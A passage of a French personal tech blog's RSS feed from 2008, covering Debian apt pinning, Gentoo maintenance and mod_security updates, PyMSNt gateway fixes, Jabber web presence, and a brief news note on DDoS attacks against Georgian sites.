Il faut alors mettre sa debian en Hybride, en ajoutant le repository unstable et régler apt pour donner une plus grande priorité a Testing.&lt;/p&gt;
&lt;h2 id=&#34;ajout-de-unstable&#34;&gt;Ajout de Unstable&lt;/h2&gt;
&lt;p&gt;Ajoutez dans votre &lt;code&gt;/etc/apt/sources.list&lt;/code&gt; les lignes correspondant à unstable.&lt;/p&gt;
&lt;p&gt;Par exemple vous pouvez avoir :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;deb http://ftp.fr.debian.org/debian/ testing main contrib
deb-src http://ftp.fr.debian.org/debian/ testing main contrib
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;ajoutez a la suite :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;deb http://ftp.fr.debian.org/debian/ unstable main contrib
deb-src http://ftp.fr.debian.org/debian/ unstable main contrib
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;régler-les-priorités&#34;&gt;Régler les priorités&lt;/h2&gt;
&lt;p&gt;Créez le fichier /etc/apt/preferences et ajoutez :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Package: *
Pin: release a=testing
Pin-Priority: 100
Package: *
Pin: release a=unstable
Pin-Priority: 90
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Il faut que la priorité de unstable (ici 90) soit inférieure a celle de testing (ici 100)&lt;br&gt;
On aurait pu mettre 1 et 2 !&lt;/p&gt;
&lt;p&gt;Ensuite, vous aurez accés a tout les paquets de testing et en plus a ceux de unstable qui manqueraient.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Conflit Russie Géorgie</title>
      <link>https://www.lamy.im/posts/conflit-russie-georgie/</link>
      <pubDate>Thu, 14 Aug 2008 01:21:08 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/conflit-russie-georgie/</guid>
      <description>Le conflit qui oppose la Russie et la Géorgie se retrouve aussi sur internet.
Depuis le 20 juillet, des sites Georgiens sont la cible d’attaques DDOS d’envergure. Les sites du parlement, du président, des banques nationales on été défacés ou mis hors ligne.
Une organisation cybercriminelle Russe connue à été identifiée comme source des attaques. Pour le moment aucune relation n’est prouvée entre le groupe criminel Russe et le Gouvernement de Moscou.</description>
      <content>&lt;p&gt;Le conflit qui oppose la Russie et la Géorgie se retrouve aussi sur internet.&lt;/p&gt;
&lt;p&gt;Depuis le 20 juillet, des sites Georgiens sont la cible d’attaques DDOS d’envergure. Les sites du parlement, du président, des banques nationales on été défacés ou mis hors ligne.&lt;/p&gt;
&lt;p&gt;Une organisation cybercriminelle Russe connue à été identifiée comme source des attaques. Pour le moment aucune relation n’est prouvée entre le groupe criminel Russe et le Gouvernement de Moscou.&lt;/p&gt;
&lt;p&gt;Certains pays ont prétés main forte à la Georgie comme l’Estonie qui à mis a disposition plusieurs experts ou encore la Pologne. Certains sites critiques sont désormais hébergés aux Etats-unis.&lt;/p&gt;
&lt;p&gt;Des infos interessantes sont dispo sur le &lt;a href=&#34;http://georgiamfa.blogspot.com&#34;&gt;blog du ministère des affaires étrangères Géorgien&lt;/a&gt;, &lt;a href=&#34;http://www.computerworld.com/action/article.do?command=viewArticleBasic&amp;amp;articleId=9112399&#34;&gt;ici&lt;/a&gt; et aussi &lt;a href=&#34;http://www.nytimes.com/2008/08/13/technology/13cyber.html&#34;&gt;là&lt;/a&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>mod_security-2.5.6 sur gentoo</title>
      <link>https://www.lamy.im/posts/mod_security-256-sur-gentoo/</link>
      <pubDate>Tue, 12 Aug 2008 05:50:52 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/mod_security-256-sur-gentoo/</guid>
      <description>mod_security est un firewall applicatif sous forme de module pour apache.
Sous gentoo, portage n’intègre pas encore la version de maintenace 2.5.6 du module mais comme les ebuilds mod_security sont bien faits, on ne va pas se casser la tête pour la mise a jour.
Il faut faire un overlay si ce n’est pas déjà fait:
mkdir -p /usr/local/portage/www-apache/mod_security/files/2.1.2 echo &amp;#39;PORTDIR_OVERLAY=&amp;#34;/usr/local/portage&amp;#34;&amp;#39; &amp;gt;&amp;gt; /etc/make.conf Après on fait l’ebuild pour la version 2.</description>
      <content>&lt;p&gt;mod_security est un firewall applicatif sous forme de module pour apache.&lt;/p&gt;
&lt;p&gt;Sous gentoo, portage n’intègre pas encore la version de maintenace 2.5.6 du module mais comme les ebuilds mod_security sont bien faits, on ne va pas se casser la tête pour la mise a jour.&lt;/p&gt;
&lt;p&gt;Il faut faire un overlay si ce n’est pas déjà fait:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;mkdir -p /usr/local/portage/www-apache/mod_security/files/2.1.2
echo &amp;#39;PORTDIR_OVERLAY=&amp;#34;/usr/local/portage&amp;#34;&amp;#39; &amp;gt;&amp;gt; /etc/make.conf
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Après on fait l’ebuild pour la version 2.5.6&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;cp /usr/portage/www-apache/mod_security/mod_security-2.5.5.ebuild /usr/local/portage/www-apache/mod_security/mod_security-2.5.6.ebuild
cp /usr/portage/www-apache/mod_security/files/2.1.2/99_mod_security.conf /usr/local/portage/www-apache/mod_security/files/2.1.2/
ebuild mod_security-2.5.6.ebuild digest
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Et hop yapuka !&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Pymsnt package à jour</title>
      <link>https://www.lamy.im/posts/pymsnt-package-a-jour/</link>
      <pubDate>Fri, 08 Aug 2008 16:17:17 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/pymsnt-package-a-jour/</guid>
      <description>Suite au billet sur pymsnt qui ne se connectait plus au réseau msn. Je me suis fais un package mis à jour avec la correction et j’en profite pour le partager ici.
Ce package est tiré du repository mercurial en date du 08 août, et contient le twistfix, la correction sur le version string et aussi un fix pour petit bug dont le patch est dispo sur le google group de pymsnt que j’ai découvert ajourd’hui.</description>
      <content>&lt;p&gt;Suite au billet sur &lt;a href=&#34;https://www.lamy.im/pymsnt-et-msn/&#34;&gt;pymsnt qui ne se connectait plus au réseau msn&lt;/a&gt;. Je me suis fais un package mis à jour avec la correction et j’en profite pour le partager ici.&lt;/p&gt;
&lt;p&gt;Ce package est tiré du repository mercurial en date du 08 août, et contient le twistfix, la correction sur le version string et aussi un fix pour petit bug dont le &lt;a href=&#34;http://py-transports.googlegroups.com/web/pymsnt-1.patch&#34;&gt;patch est dispo sur le google group de pymsnt&lt;/a&gt; que j’ai découvert ajourd’hui.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Gentoo cleaning</title>
      <link>https://www.lamy.im/posts/gentoo-cleaning/</link>
      <pubDate>Fri, 08 Aug 2008 15:39:37 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/gentoo-cleaning/</guid>
      <description>Je continue de migrer les pages du wiki. Celle la avait été pondue par Trapamoosch, merci à lui :-)
Avec le temps, il n’est pas rare de voir sa Gentoo s’encrasser : paquets inutiles, dépendances inutiles, fichier world contenant des entrées invalides… Un bon coup de ménage s’impose !
Prérequis Quelques outils sont nécessaires pour faire un bon nettoyage : gentoolkit et le script dep.
emerge -av app-portage/gentoolkit app-portage/udept
Vous devez aussi, par sécurité, faire une copie de secours de votre fichier world :</description>
      <content>&lt;p&gt;&lt;strong&gt;Je continue de migrer les pages du wiki. Celle la avait été pondue par Trapamoosch, merci à lui :-)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Avec le temps, il n’est pas rare de voir sa Gentoo s’encrasser : paquets inutiles, dépendances inutiles, fichier world contenant des entrées invalides… Un bon coup de ménage s’impose !&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Prérequis&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quelques outils sont nécessaires pour faire un bon nettoyage : &lt;em&gt;gentoolkit&lt;/em&gt; et le script &lt;em&gt;dep&lt;/em&gt;.&lt;br&gt;
&lt;code&gt;emerge -av app-portage/gentoolkit app-portage/udept&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Vous devez aussi, par sécurité, faire une copie de secours de votre fichier world :&lt;br&gt;
&lt;code&gt;cp /var/cache/edb/world /var/cache/edb/world.bak&lt;/code&gt;&lt;br&gt;
ou (pour Portage à partir de la version 2.0.51)&lt;br&gt;
&lt;code&gt;cp /var/lib/portage/world /var/lib/portage/world.bak&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Pour gagner du temps, revoyez vos flags USE dès cette étape, cela vous évitera trop de recompilations plus tard.&lt;br&gt;
De même, désinstallez tous les softs dont vous ne voulez plus dès maintenant.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Nettoyage du fichier world&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Le fichier world (&lt;code&gt;/var/cache/edb/world&lt;/code&gt; ou &lt;code&gt;/var/lib/portage/world&lt;/code&gt; à partir de Portage 2.0.51) recense tous les paquets que l’utilisateur à volontairement installé, sans les dépendances (qui sont, elles, toujours calculées à la volée par emerge). Or, il n’est pas rare de recompiler un paquet soi-même en tapant juste &lt;em&gt;emerge le-paquet&lt;/em&gt;. Imaginez que vous compiliez un paquet A qui dépend d’un autre paquet B. La compilation de B échoue, pour une raison quelconque, vous arrangez ça et pour tester, vous lancer la commande : &lt;em&gt;emerge B&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Erreur !&lt;/strong&gt; Désormais, B ne sera plus considéré par emerge comme une dépendance mais bien comme un paquet à part entière que les scripts de nettoyage omettront alors de « nettoyer ».&lt;/p&gt;
&lt;p&gt;Dans notre cas, il aurait fallu taper &lt;code&gt;emerge --oneshot B&lt;/code&gt;, qui compile et installe le paquet mais sans l’inscrire dans le fichier world. Utlisez cette option pour toute recompilation de dépendances !&lt;/p&gt;
&lt;p&gt;Utiliser un utilitaire comme &lt;em&gt;regenworld&lt;/em&gt; (qui permet de reconstruire le fichier world s’il a été altéré ou détruit) peut aussi conduire à un fichier world contenant des redondances.&lt;/p&gt;
&lt;p&gt;La première étape du nettoyage va donc consister à nettoyer le fichiers world pour en retirer toutes les dépendances qui n’ont rien à faire là et qu’emerge peut très bien recalculer tout seul. Dans ce cas, on considèrera donc comme entrée inutile tout paquet qui a au moins une dépendance sur lui. Le script dep fait cela relativement bien : &lt;code&gt;dep -pw&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;– Utilisez toujours dep avec parcimonie, et toujours avec l’option -p (pretend)&lt;br&gt;
– dep est assez efficace, mais très lent. Soyez patients !&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;dep va alors lister tous les paquets inscrits dans votre fichier world, et vous indiquer ceux qu’il estime être redondants. Ils vous suffit ensuite de les retirer de votre fichier world, toujours en vérifiant bien que ce n’est pas un paquet que vous n’aimeriez pas voir être désinstallé sans votre avis.&lt;/p&gt;
&lt;p&gt;Exemple :&lt;/p&gt;
&lt;p&gt;Vous installez un paquet A volontairement.&lt;br&gt;
Vous installez un paquet B volontairement et qui dépend de A.&lt;br&gt;
dep va considérer A comme redondant car il y a un paquet qui le considère comme dépendance (paquet B), alors que vous l’avez réellement voulu.&lt;/p&gt;
&lt;p&gt;C’est le point faible qui fait que l’on ne peut pas laisser un nettoyeur de fichier world travailler automatiquement.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Désinstallation des paquets inutile&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Les dépendances inutiles:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Une fois le fichier world propre, il est temps de retirer toutes les dépendances inutiles. On définit une dépendance inutile comme un paquet installé non inscrit dans le fichier world et sur lequel aucun autre paquet n’a de dépendance. Pour cela, très simple et toujours avec le script dep : &lt;code&gt;dep -ps&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;dep est plus stable et surtout plus fiable que l’option –depclean d’emerge. Peut-être cela changera-t-il dans les prochaines versions de Portage.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Les slots inutiles:&lt;/strong&gt;&lt;br&gt;
Certaines librairies, comme gtk+ ou qt, utilisent le système de slot qui permet de faire cohabiter plusieurs versions en même temps. Avec le temps, certaines versions deviennent inutiles. Pour retrouver les paquets « slottés » inutiles, toujours dep : &lt;code&gt;dep -pP&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dans les deux étapes précédentes, analysez bien la liste des paquets proposés pour la suppression afin de ne pas retirer des paquets voulus. Une fois ceci fait, désinstallez-les.&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fiabilisation du système&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Dans tous les cas, si vous désinstallez beaucoup de paquets d’un coup, il faut contrôler que vous n’avez pas cassé de dépendances : &lt;code&gt;emerge -NDua world &amp;amp;&amp;amp; revdep-rebuild -a&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Cela permettra de recompiler tous les paquets qui ont été touchés de près ou de loin par le remaniement du système. Une fois ceci fait, votre système doit être stable et sans problème.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Quelques gains de place&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Vous pouvez nettoyer votre dossier &lt;code&gt;/usr/portage/distfiles&lt;/code&gt; avec &lt;em&gt;eclean&lt;/em&gt;. Cet outil permet de retirer toutes les archives de sources qui n’ont plus d’intérêt. Il garde toutes les archives des paquets installés, pour que vous n’ayez pas à les retélécharger au cas où vous voudriez les recompiler. &lt;code&gt;eclean -d distfiles &amp;amp;&amp;amp; eclean -d packages&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Pensez que lorsque emerge désinstalle les sources d’un kernel, il ne retire pas tout. Pensez à nettoyer votre &lt;code&gt;/usr/src&lt;/code&gt; pour retirer tous les dossiers inutiles des versions de kernels que vous avez désinstallées.&lt;/p&gt;
&lt;p&gt;Vous pouvez aussi nettoyer le dossier &lt;code&gt;/lib/modules&lt;/code&gt; pour retirer tous les modules des versions de kernels que vous avez désinstallés.&lt;/p&gt;
&lt;p&gt;Il peut être utile également de vider de temps en temps les dossiers temporaires comme &lt;code&gt;/tmp&lt;/code&gt; et &lt;code&gt;/var/tmp&lt;/code&gt;.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Un mail qu&#39;il est bien</title>
      <link>https://www.lamy.im/posts/un-mail-quil-est-bien/</link>
      <pubDate>Thu, 07 Aug 2008 02:15:25 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/un-mail-quil-est-bien/</guid>
      <description>Parfois on reste plusieurs minutes à lire un mail qui vaut le détour. Ce n’est pas que celui ci soit une envolée rhétorique mais il vaut son pesant.
Ce mail à été envoyé à une mailing list à laquelle je suis abonné.
j c pa tro komen c truc fonctionne.ksk j dow fèr pour dialoguer avec un d cè gen.komen écrire é lenvowé.s8 vrèmen out.
Non y’a rien d’autre.. tout le mail est la…</description>
      <content>&lt;p&gt;Parfois on reste plusieurs minutes à lire un mail qui vaut le détour. Ce n’est pas que celui ci soit une envolée rhétorique mais il vaut son pesant.&lt;br&gt;
Ce mail à été envoyé à une mailing list à laquelle je suis abonné.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;j c pa tro komen c truc fonctionne.ksk j dow fèr pour dialoguer avec un d cè gen.komen écrire é lenvowé.s8 vrèmen out.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Non y’a rien d’autre.. tout le mail est la…&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Afficher son status jabber sur le web</title>
      <link>https://www.lamy.im/posts/afficher-son-status-jabber-sur-le-web/</link>
      <pubDate>Wed, 06 Aug 2008 01:02:47 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/afficher-son-status-jabber-sur-le-web/</guid>
      <description>Je vais migrer petit à petit les infos du wiki par ici pour tout centraliser et simplifier la maintenance.
Comme j’ai le nez dans jabber en ce moment. Je remet ici comment utiliser le module webpresence disponible sur le serveur jabber.
Il suffit de s’inscrire au service webpresence pour pouvoir afficher son status sur le web via une image :-) Allez dans « service discovery » puis s’inscrire au service »presence.</description>
      <content>&lt;p&gt;Je vais migrer petit à petit les infos du wiki par ici pour tout centraliser et simplifier la maintenance.&lt;/p&gt;
&lt;p&gt;Comme j’ai le nez dans jabber en ce moment. Je remet ici comment utiliser le module webpresence disponible sur le serveur jabber.&lt;/p&gt;
&lt;p&gt;Il suffit de s’inscrire au service webpresence pour pouvoir afficher son status sur le web via une image :-)
Allez dans « service discovery » puis s’inscrire au service »presence.lamy.im ». La il faudra choisir parmis la longue liste de thèmes d’icones disponibles. Ca se passe par ici : &lt;a href=&#34;http://lamy.im:5280/presence/themes&#34;&gt;http://lamy.im:5280/presence/themes&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Dès que c’est fait vous recevez un message indiquant la marche à suivre pour utiliser le service webpresence.&lt;/p&gt;
&lt;p&gt;Maintenant il ne reste plus qu’a recuperer son status !&lt;br&gt;
voici un exemple pour mon jabber id:&lt;br&gt;
&lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&lt;/a&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Dans un navigateur web il suffit de coller l’url qui va bien * sortie XML:&lt;br&gt;
&lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/xml/&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/xml/&lt;/a&gt;&lt;br&gt;
* avec une image ma ptite dame: &lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&lt;/a&gt;&lt;br&gt;
* pour forcer un theme d’image: &lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&amp;amp;lt;theme&amp;amp;gt;/&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&amp;amp;lt;theme&amp;amp;gt;/&lt;/a&gt;&lt;br&gt;
* on peut vouloir montrer son avatar: &lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/avatar/&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/avatar/&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;On peut également choisir de n’afficher les données que d’une ressource connectée au compte jabber: &lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/text/res/&amp;amp;lt;resource&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/text/res/&amp;amp;lt;resource&lt;/a&gt;&amp;gt; &lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/image/res/&amp;amp;lt;resource&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/image/res/&amp;amp;lt;resource&lt;/a&gt;&amp;gt; &lt;a href=&#34;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&amp;amp;lt;theme&amp;amp;gt;/res/&amp;amp;lt;resource&#34;&gt;http://lamy.im:5280/presence/jid/jc/lamy.im/image/&amp;amp;lt;theme&amp;amp;gt;/res/&amp;amp;lt;resource&lt;/a&gt;&amp;gt;&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ouaah, en plus d’etre à la pointe avec un compte jabber, vous pouvez afficher depuis n’importe où votre indisponibilité (ou l’inverse).
N’hesitez pas a me contacter si vous avez des soucis 🙂&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>PyMSNt et msn sont dans un bateau</title>
      <link>https://www.lamy.im/posts/pymsnt-version-string/</link>
      <pubDate>Wed, 06 Aug 2008 00:48:21 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/pymsnt-version-string/</guid>
      <description>Voila que depuis hier, la passerelle msn du site refuse de fonctionner. Je me suis lancé dans le décorticage de cette appli en python qui utilise le framework twisted pour causer un protocole de cochon.
Voila ce qu’on trouve comme insulte dans les logs quand la passerelle tente de causer le msnien:
## VER 1 MSNP11 CVR0 ## VER 1 MSNP11 Error in line: VER 1 MSNP11 (Invalid version response) Stopping factory legacy.</description>
      <content>&lt;p&gt;Voila que depuis hier, la &lt;a href=&#34;http://delx.net.au/projects/pymsnt/&#34; title=&#34;passerelle msn&#34;&gt;passerelle msn&lt;/a&gt; du site refuse de fonctionner. Je me suis lancé dans le décorticage de cette appli en python qui utilise le framework twisted pour causer un protocole de cochon.&lt;/p&gt;
&lt;p&gt;Voila ce qu’on trouve comme insulte dans les logs quand la passerelle tente de causer le msnien:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;## VER 1 MSNP11 CVR0  
## VER 1 MSNP11  
Error in line: VER 1 MSNP11 (Invalid version response)  
Stopping factory legacy.msn.msn.DispatchFactory instance at 0x183895cc;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;S’en suit dans ma fenetre jabber un joli message :&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Failed to connect to MSN servers: \[Failure instance: Traceback (failure with no frames): &amp;amp;lt;type ‘exceptions.Exception’&amp;amp;gt;: Timeout\]&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;La grande classe hein… Clairement, l’annonce du protocole ne plait pas à nos voisins d’en face.&lt;br&gt;
Après m’etre demandé si j’allais continuer ou pas de faire tourner cette passerelle, je me suis finalement mis en tete de la faire fonctionner :o)&lt;/p&gt;
&lt;p&gt;Pour faire rapide, le truc est à la ligne 113 du fichier &lt;em&gt;src/legacy/msn/msn.py&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;A la base on à : &lt;code&gt;MSN\_PROTOCOL\_VERSION = « MSNP11 CVR0 »&lt;/code&gt;&lt;br&gt;
Il faut mettre : &lt;code&gt;MSN\_PROTOCOL\_VERSION = « MSNP11 »&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Redémarrage de la passerelle et ensuite tout le monde est content. Je n’ai toujours pas compris l’interet de nous fermer la porte au nez mais ca n’empeche pas grand chose.&lt;/p&gt;
</content>
    </item>
    
  </channel>
</rss>
